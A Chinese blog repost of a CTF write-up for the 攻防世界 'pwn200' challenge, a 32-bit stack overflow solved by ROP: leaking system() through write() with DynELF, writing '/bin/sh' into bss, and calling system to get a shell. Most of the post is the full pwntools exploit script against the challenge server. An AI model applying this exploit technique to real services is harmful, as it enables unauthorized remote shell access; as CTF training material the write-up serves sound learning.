欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

攻防世界 pwn200 WP

程序员文章站 2022-07-09 12:40:22
...

32位栈溢出程序
关于ROP:https://blog.csdn.net/Zarcs_233/article/details/103996634
具体思路(ROP):
1.搞到system函数地址,可以通过dynelf
2.写入’/bin/sh’,用做system参数
3.调用system函数
EXP:

from pwn import *
context.log_level='debug'
p=remote("111.198.29.45",30502)
start=0x80483D0    #程序起始代码,实现复用
def leak(addr):
	write_addr=0x80483C0
	payload='a'*112+p32(write_addr)+p32(start)+p32(1)+p32(addr)+p32(4)  #rop调用write泄露
	p.recvuntil("Welcome to XDCTF2015~!\n")
	p.send(payload)
	buff=p.recv(4)
	return buff
dyn=DynELF(leak,elf=ELF("./bed0c68697f74e649f3e1c64ff7838b8"))
system=dyn.lookup("system","libc")
print("get system address:%X" % system)
def write():
	bin="/bin/sh"
	read_addr=0x8048390
	bss=0x804A048
	payload='a'*112+p32(read_addr)+p32(start)+p32(0)+p32(bss)+p32(8)  #ROP读入/bin/sh
	p.recvuntil("Welcome to XDCTF2015~!\n")
	p.send(payload)
	p.sendline(bin)
write()
payload='a'*112+p32(system)+p32(0)+p32(0x804A048) #ROP调用system获得shell
p.recvuntil("Welcome to XDCTF2015~!\n")
p.send(payload)
p.interactive()

这里由于是32位程序,参数直接存在stack中,所以可以直接构造栈帧,但是有一点需要注意,那就是bss,这里我没有直接使用bss开头,因为bss开头是stdin和stdout,而read之后跳转到start,程序会再次修改stdin和stdout的值。所以这里使用了bss结尾处的内存区域。

相关标签: CTF